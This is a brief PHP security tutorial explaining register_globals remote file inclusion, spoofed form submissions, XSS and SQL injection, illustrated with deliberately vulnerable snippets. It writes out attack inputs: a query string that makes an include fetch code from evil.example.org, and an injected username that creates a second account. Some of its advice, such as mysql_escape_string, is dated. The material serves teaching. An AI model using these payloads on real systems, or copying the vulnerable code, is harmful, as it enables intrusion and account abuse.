PHP Coding Security
Security is one of the most concerning issue to every web application developer. However, most loopholes exist due to poor coding. The following discuss how can we go about improving the security and prevent hacking through proper coding.
Register Globals
register_globals is disabled by default in PHP versions 4.2.0 and onwards due to a security risk. Therefore, you should always develop and deploy applications with register_globals disabled.
It can be problematic when we include a dynamic path like:
<?php
include "$path/script.php";
?>
With register_globals enabled, this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:
<?php
include 'http://evil.example.org/?/script.php';
?>
This will include the output of http://evil.example.org/ just as if it were a local file. This is a major security vulnerability, and it is one that has been discovered in some popular open source applications. It is recommended to use $_POST and $_GET instead.
Spoofed Form Submissions
This is the elimination of the need of the script located at the actual server. One can easily submit any form to your server from other remote servers. Imagine a form located at: http://example.org/form.html.
<form action="/process.php" method="POST">
<select name="color">
<option value="red">red</option>
<option value="green">green</option>
<option value="blue">blue</option>
</select>
<input type="submit" />
</form>
Imagine a potential attacker who saves this HTML and modifies it as follows:
<form action="http://example.org/process.php" method="POST">
<select name="color">
<option value="blue">blue</option>
</select>
<input type="submit" />
</form>
This new form can now be located anywhere and can be manipulated as desired. The absolute URL used in the action attribute causes the POST request to be sent to the same place. This makes it very easy to eliminate any client-side restrictions. Therefore, always use server-side validation to ensure that the form is validated.
Cross-Site Scripting
Cross-Site Scripting (XSS)is one of the most common security vulnerabilities in web applications, and many popular open source PHP applications suffer from constant XSS vulnerabilities. This will happen if you display content from any external sources without filtering it properly.
XSS can be prevented by:
- Filter all external data - Always validate all external data as it enters and exits your application. You will mitigate a majority of XSS concerns by doing porper filtering.
- Use existing functions - PHP has several excellent in house filtering logic. Functions like htmlentities(), strip_tags(), and utf8_decode() can be useful. PHP function executes much faster, and it has been tested and less likely to contain errors that yield vulnerabilities.
SQL Injection
SQL injection attacks are simple to defend against, but many applications are still vulnerable. Consider the following SQL statement:
<?php
$sql = "INSERT
INTO users (reg_username,
reg_password,
reg_email)
VALUES ('{$_POST['reg_username']}',
'$reg_password',
'{$_POST['reg_email']}')";
?>
Assume that this query is creating a new account. The user provides a desired username and an email address. The registration application generates a temporary password and emails it to the user to verify the email address. Imagine that the user enters the following as a username: bad_guy', 'mypass', ''), ('good_guy
The above does not look like a valid username but without proper filtering, the system will process accordingly and create two accounts as shown:
<?php
$sql = "INSERT
INTO users (reg_username,
reg_password,
reg_email)
VALUES ('bad_guy', 'mypass', ''), ('good_guy',
'1234',
'shiflett@php.net')";
?>
SQL injection can be prevented by filtering and escaping (mysql_escape_string()) the data.
A useful Reference
To learn more about PHP security, it is advised to read the book, Essential PHP Security by Chris Shiflett.
